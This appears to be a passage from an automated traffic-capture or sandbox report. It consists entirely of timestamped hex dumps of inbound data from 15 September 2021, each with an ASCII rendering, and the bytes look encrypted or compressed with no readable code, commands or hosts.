4a 96 07 e8 5b b3 99 2e 8b a5 ac 51 ce 58 66 ca 96 43 d7 15 4c 34 88 21 22 7b 98 4a
                                                                              Data Ascii: eus:*r Hve?fAA2SHi?-,RUT$eWRry/]o|e9oUWMX4CZ$|qnX{S\(Qv"lT#jEHw^-HBRko><Y;I3Uqp{J[.QXfCL4!"{J
                                                                              2021-09-15 08:52:38 UTC56INData Raw: a6 a6 0e df 9c b3 56 10 21 de e6 1f 19 db 89 ef f3 09 92 a9 53 78 0c cb 62 cc 59 9e 09 74 ab a1 e4 be c8 23 b0 ec 4c ff bb e0 ab d8 49 c3 ac f3 99 13 81 cd 56 1b 94 23 cf 7c 0c a2 ed 1c e4 a1 7b f6 a4 70 fd 05 5a 84 6c 6e c5 84 f8 92 4d 4b cd 20 bd 57 4e cc a7 85 8c e8 83 2a e0 97 a4 26 3c b1 a2 61 ea b9 48 e5 7c 03 4d 8d 08 e8 6b 8c 7a c4 5e b4 41 b9 ea 18 26 ee be df a7 05 a6 bc 4b f1 f8 f8 81 50 bc 21 64 d4 8a 86 ff c1 b3 10 d0 91 fc 88 17 6a 90 0a 3b 65 a9 54 82 c8 35 24 1a 0f ee 79 51 71 0a 96 b0 01 19 8b d3 a1 42 e4 8c 3a d7 ac 90 fe 8a b4 3f 94 15 b6 f6 f3 b6 91 6d b2 a6 41 24 56 77 e3 4f a5 9c 4e 35 e3 c5 a0 b3 b2 76 43 74 a6 42 7d 9f 9b 89 fe 08 27 49 31 ee ad aa f0 9a f5 8a 18 59 bb 92 44 d9 d2 61 ae 11 aa bf 64 6d 07 e2 a3 51 26 16 12 29 d3 39
                                                                              Data Ascii: V!SxbYt#LIV#|{pZlnMK WN*&<aH|Mkz^A&KP!dj;eT5$yQqB:?mA$VwON5vCtB}'I1YDadmQ&)9
                                                                              2021-09-15 08:52:38 UTC57INData Raw: 36 91 5c ab 15 e7 b4 d8 f5 26 d6 fa b9 fd 00 15 41 af 4f 08 cc e6 d2 52 86 ad fd 8d 84 ee 59 72 48 ab ee 00 17 c1 8c 7e 3d ee 05 a6 e7 5d 13 b4 22 37 2b 76 30 39 e2 aa 2d aa 5e 34 23 dd 18 f1 09 29 31 5b 72 62 8e 4a 4d bc ed fd cd 10 3a 17 d7 3e 40 8a 76 5a 53 01 55 1d 9e 9a 7f db 09 54 3f bf fc de bc fe 39 45 b6 e4 64 7c b2 d5 b5 3e a8 f2 81 d3 88 68 b5 08 50 5b 95 0a eb c1 61 ed 1a 07 f6 a9 ee a7 8f 9c 18 43 54 a2 cc 61 26 f9 69 bd d3 81 a7 ce 86 77 17 3e 04 41 75 e8 c2 4e c1 50 a5 1d 83 45 bd 47 a5 52 a7 05 de 2d 0f 42 7b 87 7b 44 b4 4c 30 e5 ca 14 15 7f c3 c3 33 30 92 f5 73 02 fd 76 56 c9 e8 74 1b 5a 85 8e c0 a7 5a 8c db 8e 9e 35 db 9d 2f 50 8e 20 7e 6b 4d 6c 8d 8c e2 4e cc 7c ba 99 2d 87 07 6a 2e b5 ef 58 76 d8 7b d9 2e 51 60 da 5f 14 2a 8b 1b e8 45
                                                                              Data Ascii: 6\&AORYrH~=]"7+v09-^4#)1[rbJM:>@vZSUT?9Ed|>hP[aCTa&iw>AuNPEGR-B{{DL030svVtZZ5/P ~kMlN|-j.Xv{.Q`_*E
                                                                              2021-09-15 08:52:38 UTC59INData Raw: b6 d3 1c bf 37 82 f4 57 56 f4 7d 54 36 51 9c 0c 30 12 49 60 2f 5e ec d3 be 25 d8 7c 53 3f 75 9b 00 f3 d1 f9 5e 1c 96 6c 6e ba e7 30 cc 11 ea ea 77 62 5a 13 c5 1c 5f f0 ca ef 39 5a bf 9c f3 d5 c5 74 42 bc fe 8e 79 47 ce 62 ee ca ff 67 35 19 e7 ca 88 52 1e 80 8b 50 ac ed f1 f6 e9 45 ce 8e a6 cd f8 eb 22 4d 5a f1 ef ab 72 31 ec 73 b2 21 d3 08 37 01 e4 9c 59 83 86 06 c7 fe e2 be 9b 8a 51 b0 c9 cc a3 b0 33 80 38 65 85 6d 0a 15 29 1f 46 19 84 eb f6 5e db 05 b6 93 03 5a af 80 66 5c 50 05 aa e9 6b ad 70 45 4f e7 f8 fd 63 a5 37 1b b2 3d 37 6c c0 26 8e f3 72 0a d8 14 25 7d ed 96 ef 7b 7f 80 ba 40 67 0d 2d 43 90 9f ea 42 2e 90 37 2f 70 bc d9 4c 0d d6 1f b4 72 e8 55 ec c9 93 54 e8 55 4e 84 76 41 ef b2 34 f8 18 0f be d1 d5 9b 1b 3a 7f a0 e4 7a de 3b eb 3f e8 ff 72 aa
                                                                              Data Ascii: 7WV}T6Q0I`/^%|S?u^ln0wbZ_9ZtByGbg5RPE"MZr1s!7YQ38em)F^Zf\PkpEOc7=7l&r%}{@g-CB.7/pLrUTUNvA4:z;?r
                                                                              2021-09-15 08:52:38 UTC60INData Raw: 88 e8 b3 81 9b 89 b6 a9 16 83 50 4d be 97 ac 1d 1b 8e 15 63 75 10 12 aa a1 20 e3 f2 54 34 d9 8e 5a 35 5a 79 f4 76 c3 33 61 69 a8 b0 8f 55 80 5b 60 40 72 6c 55 80 fa f9 a7 c3 95 db 8e 98 77 bb 87 80 50 cb a9 a6 ee 96 f0 49 59 db 3a 92 11 4e 30 2d 87 ee e3 28 5d 3f e2 56 70 d4 ad 64 3c 30 75 5f 14 c0 60 49 80 ba af 23 a3 d1 97 2a 09 61 53 81 91 6d b3 c0 bc 63 ac c7 b1 4a 15 6b 07 e6 da 21 0c 37 07 44 b5 42 9d 81 5f da 0b 65 3a 0d 5c 69 1b 3e a2 7c 5d 20 d8 ea e1 f4 0d 85 3b 62 84 51 77 ab 7c 4a fa 5a 5d db 41 bf 76 04 aa 63 3b bd 57 ed 75 02 ed 6c f3 e5 22 3f 1f e8 ef 91 9e e2 8d 01 33 2d 79 37 f3 dd 36 f2 f5 3f 3f 61 b0 46 5d 7d bc 12 8d e4 63 72 1c a2 ba b9 ab 4e c7 54 34 d7 56 a6 0b 71 42 c4 71 24 a6 4c ea da 54 63 7f 12 6e 3a 00 34 3e 19 50 25 ec c5 84
                                                                              Data Ascii: PMcu T4Z5Zyv3aiU[`@rlUwPIY:N0-(]?Vpd<0u_`I#*aSmcJk!7DB_e:\i>|] ;bQw|JZ]Avc;Wul"?3-y76??aF]}crNT4VqBq$LTcn:4>P%
                                                                              2021-09-15 08:52:38 UTC61INData Raw: 57 18 12 b3 5e f2 63 f9 33 55 cd 26 59 10 36 06 0f c7 29 41 e5 a4 ef cb 1b ef fb 0b 8c 48 3c fc 49 5e 18 3e a0 25 6a 07 39 f8 09 77 65 b0 57 f1 61 87 60 90 44 53 42 2e e2 c7 7f 66 d7 cb db 6a b6 1a 58 17 31 3e ed c9 e1 9a 55 65 6e c0 d8 41 23 8d db 3d bf 94 c8 a9 25 20 b9 7a f2 a8 39 6c 9b c2 60 6a 3c ff 69 a9 aa 43 b7 f8 02 56 79 87 43 81 40 22 c8 20 51 8a 43 6e 9a c6 24 36 64 ef c0 ce 9f 6f 73 95 73 33 9a b9 76 04 46 2b ad d6 29 13 4d b2 d3 61 67 c6 e2 37 c5 66 14 bc ff bf b2 e3 eb 2a f9 dc 90 61 22 1c b7 f2 f8 16 a9 bd 7a 8f c1 dd 26 dd a2 ca 92 5c ab 2d f2 dc fc 08 54 ac ff d2 d2 02 61 eb d2 a3 34 9d 19 c5 bd 68 da fc f9 fe e2 04 60 f7 12 6b 9b bf 7b d9 96 4e 17 12 4c 3e 37 98 c2 98 14 48 1a a9 2e 34 7a 97 a5 85 d0 5b 5d 99 ab db 70 aa 02 3b 0a 7c c7
                                                                              Data Ascii: W^c3U&Y6)AH<I^>%j9weWa`DSB.fjX1>UenA#=% z9l`j<iCVyC@" QCn$6doss3vF+)Mag7f*a"z&\-Ta4h`k{NL>7H.4z[]p;|
                                                                              2021-09-15 08:52:38 UTC63INData Raw: fc 0d 54 d1 1b 84 5a 60 a4 bc b1 79 2b 0e f0 bf 72 1b f8 35 05 07 a9 6f b8 91 a2 26 29 34 41 d8 a6 a6 32 8f 23 27 e9 ef 42 99 60 b8 bf b6 98 07 01 7b 5c 38 09 1d bb 7b 8a 66 90 25 09 06 11 10 50 be 08 7b c5 46 43 9c d1 52 bc 83 8e 69 93 b5 c4 53 3f 32 11 8f bc 91 8f 94 24 bb 86 1d 90 0b 34 2e 31 50 9e 5f c5 84 6c 50 14 b2 57 e0 60 17 6f ed f8 72 40 09 a9 92 7c 05 29 19 83 b0 40 60 ef 97 57 f1 ac 0e 6e cd 8c 19 78 11 7a 92 6c 27 29 b6 90 51 61 b7 ec ab 26 9a 04 da 7b 76 1c e3 73 8c 4f 24 0a 88 c9 41 45 4e 8a f2 21 50 c7 e9 74 b6 43 77 1a 1e b6 b5 c4 e5 1c 3a 3d 37 33 f4 3e 7c 54 22 32 92 95 81 68 c6 a3 d0 a1 59 72 40 9b 27 44 a3 9d 35 df 8d 37 51 53 a1 a2 1d 1c d2 0e e9 52 33 9e 15 2a f7 ee a5 9c ad 88 ad d5 ca 3e 7c df 05 f0 f3 b6 c5 f3 a4 85 01 1f f2 76
                                                                              Data Ascii: TZ`y+r5o&)4A2#'B`{\8{f%P{FCRiS?2$4.1P_lPW`or@|)@`Wnxzl')Qa&{vsO$AEN!PtCw:=73>|T"2hYr@'D57QSR3*>|v
                                                                              2021-09-15 08:52:38 UTC64INData Raw: 6e 8d eb bf 0d 15 f6 90 ca 18 cc 6b 79 53 63 6f 13 12 04 b7 f2 f8 f5 64 82 d2 d9 1d a7 49 dc e8 b9 e7 f6 98 ad d8 76 43 f7 26 9c e7 d2 d2 02 82 26 e1 0b 09 41 63 b6 bc 22 ad 89 53 c9 62 3d ca 48 ed 19 6b db 3f 29 69 26 8f 0d 19 6c 45 e2 c1 23 37 5f b8 99 15 23 71 95 aa 2a 8e 6a 66 26 54 af 18 cd 25 22 89 09 26 1a 13 ed fd ae c3 a9 00 4f f4 3a d1 74 10 28 af 21 a7 0e 52 29 03 b8 98 ba b4 02 de 93 f0 ac f6 db 4f dd 7c b2 19 c0 e4 0f 54 1a 32 38 74 ff e1 7e 4f 8e 4f 0c 97 32 12 0d 12 7e 0c 48 75 ae c1 e0 11 43 80 73 ea ee 8c 5d e1 a8 cd 0e d8 55 88 17 63 d8 aa 70 73 32 70 28 ad 5a e2 e0 16 12 e8 fb b3 96 34 23 59 f0 07 a9 de f0 01 a8 06 c9 16 87 d8 90 8c 3e c3 1c d3 a2 35 29 5b 4c e4 81 26 fc f3 77 66 4f 8e c0 a7 ea e2 db 8e 98 f5 ab eb 85 4b dc 4e 3b 94 b2
                                                                              Data Ascii: nkyScodIvC&&Ac"Sb=Hk?)i&lE#7_#q*jf&T%"&O:t(!R)O|T28t~OO2~HuCs]Ucps2p(Z4#Y>5)[L&wfOKN;
                                                                              2021-09-15 08:52:38 UTC65INData Raw: 62 49 98 04 90 4d 8b e3 1c 1b 94 9d 25 f5 fa c1 8c 4f 0b 76 79 74 94 c7 ba 79 b6 43 4b 46 0f 7c b5 c4 64 80 37 82 c8 35 34 4a dd f5 86 32 22 08 ab 4b 8a 54 2f 5e ec aa be 4e d8 02 53 45 75 df 00 b2 d1 af 5e 5d 96 15 6e e6 e7 0e cc 61 ea c3 77 53 5a 0c c5 1f 5f fe ca da 39 5e bf 8c f3 b6 c5 1b 42 cb fe e0 79 6c ce 11 ee ec ff 1f 35 5a e7 d2 88 2a 1e f4 8b 05 27 01 c2 63 37 c1 86 ab 92 30 63 eb 41 7f 84 e2 cb 27 4b 77 50 8c 7e 68 14 d9 93 9a 92 05 ac 2f 9a b9 38 b4 96 74 2b 8a 51 d2 ac e5 9d c4 0c 8a 88 45 b2 d3 f5 9d 77 ca 30 0a 48 ab 3a 9b 77 ab 18 4b ad 0a 07 17 d6 37 8d 9d 33 e9 a4 40 b4 91 4b f7 fc 9c b1 98 45 a1 c3 90 7a c1 3c 13 fc 49 62 18 ab ae 25 6a 75 09 e4 6c 57 80 b1 57 3d 2a 87 d4 c3 6a 42 bd b5 e2 42 bb 11 08 b9 36 6e a6 a5 a7 ca 39 27 8b cb
                                                                              Data Ascii: bIM%OvytyCKF|d754J2"KT/^NSEu^]nawSZ_9^Byl5Z*'c70cA'KwP~h/8t+QEw0H:wK73@KEz<Ib%julWW=*jBB6n9'
                                                                              2021-09-15 08:52:38 UTC66INData Raw: cd b9 c6 9e 7b 7c 7e 98 4b cc 37 e0 3b b9 bc ff c3 b8 ab d8 4f d3 98 f0 72 cb c1 cd 06 dd 72 9c 30 57 40 fe 23 1c 90 1f 1a f0 a4 48 4a 4d 61 f0 76 b8 42 48 a8 1f 08 ef 9d ad f8 a3 c5 b3 57 43 83 a4 7c d5 6b c2 0c 9d 10 68 e2 3d 52 f1 91 a7 7c eb 38 4e f7 17 e0 d1 d6 49 1b 2a a9 2b b5 9f d9 11 fb 6f f7 88 e3 49 90 90 04 62 0a 05 4c a3 bb db 75 30 01 6d 7c ff 6f c0 e9 70 26 d3 b4 c7 7e 71 04 f8 3e c8 41 42 7a d7 c3 da b9 86 55 0d b0 ba 38 a6 7e 61 b3 52 8c 76 1a ac 90 f8 8a f0 39 94 51 b6 ba e5 b6 91 6b aa ea 47 34 1a 27 57 10 1b 63 2d b7 24 6a 35 80 e2 b0 fa 0b 1b 5b 82 e4 bd 4a 06 e9 76 bd 97 10 ee e4 74 5a c1 9c 3b e1 77 ad 95 78 c4 80 d8 0e 4e 70 bd 2d 07 28 d5 3b 1f ef 1a 26 56 fb 11 ae d6 76 e8 9b 0a b4 7d da 3a d7 85 64 db 65 98 b9 4c 68 e3 b4 fa 75
                                                                              Data Ascii: {|~K7;Orr0W@#HJMavBHWC|kh=R|8NI*+oIbLu0m|op&~q>ABzU8~aRv9QkG4'Wc-$j5[JvtZ;wxNp-(;&Vv}:deLhu
                                                                              2021-09-15 08:52:38 UTC67INData Raw: 82 0c 59 8d e4 d7 67 81 b7 12 e6 82 57 eb d6 b8 4e 63 fa 21 6c bc 67 49 dd c8 a0 31 cc d1 cb ad d2 55 d5 7d df ee d8 f7 50 5a 55 fc 62 ea 84 cc 9e 82 12 02 25 96 69 ee 28 b3 c5 45 8b cc ac 34 de 58 66 c2 de 43 b8 3b 3f 40 fc 59 6c 0f f9 4a 33 01 9a d6 c6 0a cc 49 f1 ab e5 30 98 e9 bf a8 86 f3 39 a3 54 1e 77 ee 6e 71 ca 1b e8 c8 14 ea 3b eb 4d 17 b3 6c ea 7c 69 bf 1c 1a c6 f8 53 dd 1c 12 41 9b c9 17 b6 f4 2b ee fa e2 94 d8 a7 4c 0a 52 67 85 a8 87 0c 10 42 bd 84 bb d7 1b 98 91 20 dd 23 46 3e b7 de d2 79 fb 8e fd ea 0d 5d da b6 01 2c 9f 78 fa 3f a7 0e 84 db 8e 98 f5 bf 30 5d ea dc a9 2b 97 a5 88 6c 2d e2 3a 0c 11 a1 71 ba cb fc 68 a5 a7 b7 58 76 73 7b d9 2e 81 1c 86 3c 5a d1 88 90 e8 ad 30 23 02 75 df e4 2d 64 55 28 f2 22 12 0f 9d 37 d8 cc c7 94 a0 02 c9 0f
                                                                              Data Ascii: YgWNc!lgI1U}PZUb%i(E4XfC;?@YlJ3I09Twnq;Ml|iSA+LRgB #F>y],x?0]+l-:qhXvs{.<Z0#u-dU("7
                                                                              2021-09-15 08:52:38 UTC68INData Raw: 91 3f 27 d3 d8 ea 31 20 ff 4d 81 20 db 1d 69 b6 91 6d b2 e2 24 c7 df 60 88 9b d7 23 3a 8f a0 1e df 5f 88 7a bf 74 e1 ee 2d a9 ad 36 01 8a 79 be 5b 2d 11 1b 00 be a5 c5 a6 a6 03 52 f6 72 d1 fa d8 8a 47 0a 43 d2 f8 3f 6b 48 a4 eb ed d6 58 84 ec 46 bf ce 52 8c 0a 6c b1 ae 91 9a e6 99 21 e0 26 46 4c 2f 53 e4 a3 9a 51 a4 5b 91 ed ae c7 fc ea 3e ee 9c bb 55 ea c1 cd 1d 02 78 58 f0 01 d1 d3 3d cf 65 aa 65 ac 8e ef fa 31 9d 0e 35 11 49 f7 5d fb 9e 79 54 37 1b c0 f3 da a0 70 ad 71 87 88 a8 ee d3 35 6a 07 26 10 09 67 e9 b1 57 f1 4b fa 0d 39 97 89 bd 39 65 28 20 67 a3 b1 9f 0d a4 a5 08 17 31 8a ec c9 e1 9a 55 41 6e 95 bd 41 23 f9 e3 89 be 94 c8 4a a8 5d 4b 3b 7f a6 b3 ca 8c c6 05 c0 17 7d c8 75 c0 98 b7 b2 65 09 7a c8 6a 19 26 62 20 96 8e e1 42 1a e0 69 8e 19 73 37
                                                                              Data Ascii: ?'1 M im$`#:_zt-6y[-RrGC?kHXFRl!&FL/SQ[>UxX=ee15I]yT7pq5j&gWK99e( g1UAnA#J]K;}uezj&b Bis7
                                                                              2021-09-15 08:52:38 UTC70INData Raw: 06 86 78 da 18 ef 17 68 91 35 71 9c 51 c1 c3 47 0f 0d 0b 8c fd 45 0d 8d ae e9 06 61 55 2d 8d d7 cc b1 24 db fa 9e 28 ad 9f 2f 24 21 b2 ca 2a 4d 0f 44 8a f5 96 af 06 d5 57 12 22 e4 31 4a 3c ff d8 ef 82 c5 26 2e 51 60 d9 5f 14 2a d0 1b e8 45 b8 c2 d3 75 ab 2c 8c c8 30 cb 35 56 b8 30 9c d6 c3 cc c7 f4 0d 69 07 e2 0e 3a ab 54 71 4b 89 e8 9d 28 94 f2 d5 5f b0 ff 2e a9 2a a9 1d ff 94 00 43 10 0d 5a c5 a5 83 e7 22 e0 ab 9f 0a a5 17 e6 24 ff ca 39 63 ea f1 cc 3b a9 36 b3 b3 35 e7 ae de 2a fd be d5 a8 2c ff 00 c6 fe 49 33 58 73 66 f6 73 fc fa 80 b0 68 dc d9 b0 34 0e 70 ab 99 39 76 71 0b 93 8a 43 e8 b7 46 01 4f 23 99 2d 4a 15 34 f1 a9 67 c7 c1 26 27 7c 8f 19 ed 1c 5c 34 ea 13 87 b7 54 13 5e 84 a3 81 09 6c 40 c8 48 18 62 20 ad 2b 2d 5a 35 92 7c 71 09 01 e6 87 dc 77
                                                                              Data Ascii: xh5qQGEaU-$(/$!*MDW"1J<&.Q`_*Eu,05V0i:TqK(_.*CZ"$9c;65*,I3Xsfsh4p9vqCFO#-J4g&'|\4T^l@Hb +-Z5|qw
                                                                              2021-09-15 08:52:38 UTC71INData Raw: bd b4 3d 3b d4 62 e0 c3 4d 9a 7b 06 14 0a cc cb 8c 4a dd ab a1 c7 b8 e5 e0 3b 81 64 68 fd 55 21 00 8d 20 13 6d cc 38 a7 b3 b2 a9 b3 4b 5d 98 73 c6 f9 69 96 79 85 d9 56 df 4e 91 5e 72 ab 6d 98 e4 a9 70 6a 17 a4 b3 d3 64 b0 ae 87 52 14 c8 f8 55 54 ed 64 65 57 0b 3d ef f1 20 40 37 52 59 5b 75 2b 63 4d 71 e6 64 f7 b8 ce 9f 1d 83 e1 65 b4 47 2e 11 64 43 cf 9a 51 b9 ed b2 a5 23 1d 54 d1 00 23 c6 71 b0 20 90 be 8e f5 7a ae eb 63 7b 55 f8 ce 12 86 e2 c0 3f 7d 92 d9 90 0c d9 56 17 2b 6c d3 54 45 6a 31 bc 04 d9 29 77 09 2d a9 ea fb 16 06 09 9c e6 1f 42 dd 52 02 06 03 8a a4 8d eb 12 e6 de 55 c1 d6 96 47 17 fa 59 68 c8 67 49 d0 c8 aa 33 cc d1 cb f1 87 de 39 c8 d5 ee d8 ab 3a 70 3f d2 2b fc 7d f2 cd bb 45 8b 70 6e e0 ad d4 3e 80 d2 63 fa 82 ae 21 6b a6 9f b6 e8 ad 54
                                                                              Data Ascii: =;bM{J;dhU! m8K]siyVN^rmpjdRUTdeW= @7RY[u+cMqdeG.dCQ#T#q zc{U?}V+lTEj1)w-BRUGYhgI39:p?+}Epn>c!kT
                                                                              2021-09-15 08:52:38 UTC72INData Raw: 2a 85 42 6f 6e c1 ff 27 d2 c3 7b b2 7b 28 56 10 10 8e 2a 47 40 db 15 54 f3 09 92 79 37 08 b6 c4 07 1b b1 9c 09 06 06 9d 4c cc 72 68 ae 31 41 e8 7b 0b d1 ab 3f 69 93 a2 5e eb 3e 32 65 62 c0 9e 30 6b f9 c1 67 17 07 7c a6 3a e1 47 60 eb 52 eb 8a a4 80 c1 2d 6b f5 18 62 20 6d 37 38 66 a8 d4 87 8f 7c d5 83 30 29 60 ef 97 57 15 af 0e 6e cd e4 f2 79 11 7a 92 98 24 29 b6 a1 02 a9 5f b5 0f 3a 43 04 90 7c 1d 9b e1 e4 83 30 e1 76 f8 b3 36 53 67 6a 86 8b 1f ba d5 c5 b6 43 d0 47 b4 87 b5 c4 0e 91 c0 7d 38 3b a7 ba 82 ab 22 cc 3b 3d e1 56 cb 5c a2 db 88 0b 41 9b 55 b9 9b 92 8a 20 b9 b6 d0 ad 5e b5 04 6c 91 19 18 ab a8 9c 15 60 1f 98 43 22 c5 d1 df 24 8b b3 c6 0b 32 7a 9b 4b 3a e4 f8 cc fe e0 79 db b2 37 11 1b 74 9a 5d 89 18 59 05 c7 72 7d 74 fa cf c2 38 c9 43 a6 92 03
                                                                              Data Ascii: *Bon'{{(V*G@Ty7Lrh1A{?i^>2eb0kg|:G`R-kb m78f|0)`Wnyz$)_:C|0v6SgjCG}8;";=V\AU ^l`C"$2zK:y7t]Yr}t8C
                                                                              2021-09-15 08:52:38 UTC73INData Raw: 75 b8 d9 be 22 f3 22 17 46 6c a3 56 45 6a 31 e0 08 d9 29 75 2c 2d fd b5 be 16 4b 01 cc e6 3a 6c dd 26 02 7e 01 fe a4 8d b7 12 e6 8b dc 2d 6f b0 4e 17 fa 33 6c a2 67 00 a8 31 f3 65 9b 58 8e 0d 59 10 29 99 d0 f3 27 54 63 b0 00 ba 90 ad c5 a3 fa 12 22 66 ac b6 c8 d4 9b f2 c5 ae b3 a5 a3 d5 e1 50 66 ca b4 43 35 40 cb 95 c8 92 2d 7b 72 4a db 5f dc 7c b2 6d 30 90 a1 26 a0 aa 13 d6 43 09 28 2a 95 0a 88 da c2 99 f0 0c 84 b2 b7 75 f9 4d e0 65 e1 80 73 0b ab f1 58 ac 8d 1e fd 99 de 03 e8 5b ac 6f 77 e8 b6 b1 2f 00 28 58 83 d8 b7 44 b2 75 02 8a dc 59 bd 10 f2 92 03 f5 1d 56 e3 08 6d 71 8d fe c1 c3 a6 8b 1c a0 97 a3 61 33 49 36 9c f9 76 22 3d 8e c0 c4 c4 3f 74 fc 56 50 d8 35 2c 47 4d 02 81 94 c6 c9 b6 59 08 29 f3 b8 2a ef c0 20 55 84 d6 4a 10 da a9 02 d1 fa 02 78 49
                                                                              Data Ascii: u""FlVEj1)u,-K:l&~-oN3lg1eXY)'Tc"fPfC5@-{rJ_|m0&C(*uMesX[ow/(XDuYVmqa3I6v"=?tVP5,GMY)* UJxI
                                                                              2021-09-15 08:52:38 UTC75INData Raw: 24 78 b6 43 77 24 83 24 f9 7a 8d 67 da 25 df 06 85 45 7d c1 dd 34 52 69 96 b0 75 fd 2f ed ad f6 35 64 30 b8 12 90 8a 54 85 8e 2e 52 a1 0d 1b cc 56 19 18 e1 47 34 16 77 7c 0c a5 9c 4e fd 67 6a 35 4c b2 2e 9b 4b b2 b6 4e 09 1a 21 85 14 86 cc a4 11 63 71 cb e0 ca 8b 46 46 39 13 1e 0b 8b ed 70 40 3d c9 37 a8 33 90 19 32 cc 99 97 19 2c 2e ef 25 83 07 45 bd 9a 1e 76 da e3 55 92 73 ce d8 72 0a 74 7c 0b 87 c4 2d 46 65 c5 6e 9f 51 f3 8e 80 ed b0 d3 f5 b5 d2 fb 8c f5 3c 22 4f 15 cb ab 18 49 b5 b6 05 17 d6 ee 9d 80 e6 e9 a4 36 72 30 3e 4a 95 0e 0b 9b 43 69 17 87 30 7b 48 f9 d1 be db f0 8d f9 82 7d f9 b8 ef 7b 98 c5 c3 3d 2a 15 2d 43 d9 b7 b3 fc d1 96 72 37 45 68 cb 4c 79 de 7e a7 65 4b f2 9e b3 3e ee ff 42 0d 2f 75 56 88 69 91 5e ca e6 17 3e 42 32 72 6f f7 9f e0 92
                                                                              Data Ascii: $xCw$$zg%E}4Riu/5d0T.RVG4w|Ngj5L.KN!cqFF9p@=732,.%EvUsrt|-FenQ<"OI6r0>JCi0{H}{=*-Cr7EhLy~eK>B/uVi^>B2ro
                                                                              2021-09-15 08:52:38 UTC76INData Raw: 7c 0d 40 a1 3b a3 88 53 cd 18 e3 eb d6 e0 53 15 b5 c3 db e0 e9 3b f2 36 0a 1b df a9 75 dc 02 73 3c 6d 02 bb 4b d9 80 68 1a 35 70 2a 07 3e 3c 41 cf 45 1d 27 0c ea 7f 85 73 c7 11 d2 d0 87 8e b2 0a 4d 33 60 7f ec 4f 39 60 5b ea c4 72 df b7 fc c5 56 59 1d 4e 91 7a ee 6c 59 a8 30 2d fa 5d cf a0 56 70 ee 27 28 91 08 77 01 37 21 c9 1b 63 45 af ac 7e 4e 5c 2a 19 b9 9d bd fa ad 57 0c 8a 80 e3 b8 7d ef bd 43 9e ab 10 64 7b df 6b c6 c9 79 1e 4f 77 bf c5 fb 2d 1a 60 56 b1 a9 58 73 75 68 95 54 d1 1d c1 15 3b 72 ac 51 73 ed 7c 4a 80 ef 99 d6 9a d3 cb ec 5e 76 68 c9 9b 3e 98 d0 31 d2 0c 09 42 53 bd f5 c6 eb 8b a7 02 e8 b8 0d bf e4 ad 0f 03 4c 0a 3c 93 e2 e6 10 20 f6 74 ab 8d 0e 3b 8d e3 3b 51 8a 00 7b 79 df 62 32 c6 cd ce c2 8a c1 46 ee 18 9c 3a 4c 6c cd 31 96 cc 90 0b
                                                                              Data Ascii: |@;SS;6us<mKh5p*><AE'sM3`O9`[rVYNzlY0-]Vp'(w7!cE~N\*W}Cd{kyOw-`VXsuhT;rQs|J^vh>1BSL< t;;Q{yb2F:Ll1
                                                                              2021-09-15 08:52:38 UTC77INData Raw: 42 cd f5 b7 ca 59 1d 75 ab 6c 87 c0 ca 5b 6c 9a ff 10 8e ce e9 8b 90 7a 9d a6 ad 80 3a 0b 9b 37 6f 7a 88 9f 25 af 58 30 0c 11 f0 f9 3b 83 1e bd b8 40 25 fe 77 0f a8 85 ea 2d 6c 21 a4 c2 e7 88 44 16 56 88 c3 3e 5a 6a 59 a5 a7 72 ff a6 ec c9 95 54 f8 36 d3 92 61 f2 cc 8d 91 2a 04 b3 df 05 ac 32 06 2a 97 73 83 6d 9b 0e 2b 65 b1 4e ac 71 45 d4 00 61 db a8 0b 3d 83 a3 a9 62 c8 ad 3c 1e ad 6e 9a c0 34 5e 64 8f 99 ce 9f 1d 83 bd 37 c8 65 d1 ee 01 ed 24 df ac 34 a8 7e f7 5b 34 ab 2e 65 94 32 66 14 84 2a 99 f7 1e 83 b2 14 74 41 e3 58 6f c4 48 e7 75 45 7d 6d 26 1d 67 3d 98 15 46 6c a3 bc f9 65 ce 43 85 9c d5 9f b0 22 02 15 7d ff 71 0a 33 19 d1 dd 82 0c 59 8d e4 d7 67 8d bf 12 e6 de 79 c1 a2 96 23 17 8a 59 6c c8 67 49 d1 c8 a0 33 e9 d1 9f f1 97 55 98 71 8f ee fd ab
                                                                              Data Ascii: BYul[lz:7oz%X0;@%w-l!DV>ZjYrT6a*2*sm+eNqEa=b<n4^d7e$4~[4.e2f*tAXoHuE}m&g=FleC"}q3Ygy#YlgI3Uq
                                                                              2021-09-15 08:52:38 UTC79INData Raw: 0d 90 24 0b ae c5 26 0d df 43 98 94 64 6c 10 a0 d8 87 8a 32 ae eb 3b 4d db 29 da 35 ca ee 65 f3 be 41 de 33 11 8f ee aa a8 6b 0b c8 00 6c 01 dd eb 8b a1 12 bc db 09 7e f3 09 92 79 2b 08 b6 c4 62 44 35 9e 09 a9 06 19 a9 cc 72 6a 7e 55 43 62 78 ee ec 15 83 96 e1 cf e1 36 3e 32 63 72 84 9e 30 6b 10 3a 13 e3 6f 1c c8 77 1e 47 ea a6 aa 86 6c 1a e8 f4 9a 5e 08 46 21 1e b9 ff 3a a9 da e8 17 73 83 2a d1 c7 0c 9f 10 80 83 6c ad 0e 1a 20 e8 16 c7 ee 1f 5d a6 26 29 cd db 0b 2d bd b5 e7 d9 56 3b 3a 9f 8a d1 5d 1b 18 42 54 6e 8c 6c 36 ce 4d 1d c1 46 d5 2f 24 bd c9 41 77 50 1b dd 82 c6 72 13 71 79 36 be 71 52 94 a7 22 46 38 e0 e9 b2 75 a3 47 9e de b7 be e9 5d a8 ae 90 8a 65 04 b2 d1 ad b6 5a 9b b6 91 6d 62 9a 31 9e 15 12 e2 98 a7 9c 3a 98 e5 66 35 4c b2 ae 37 02 0c 49
                                                                              Data Ascii: $&Cdl2;M)5eA3kl~y+bD5rj~UCbx6>2cr0k:owGl^F!:s*l ]&)-V;:]BTnl6MF/$AwPrqy6qR"F8uG]eZmb1:f5L7I
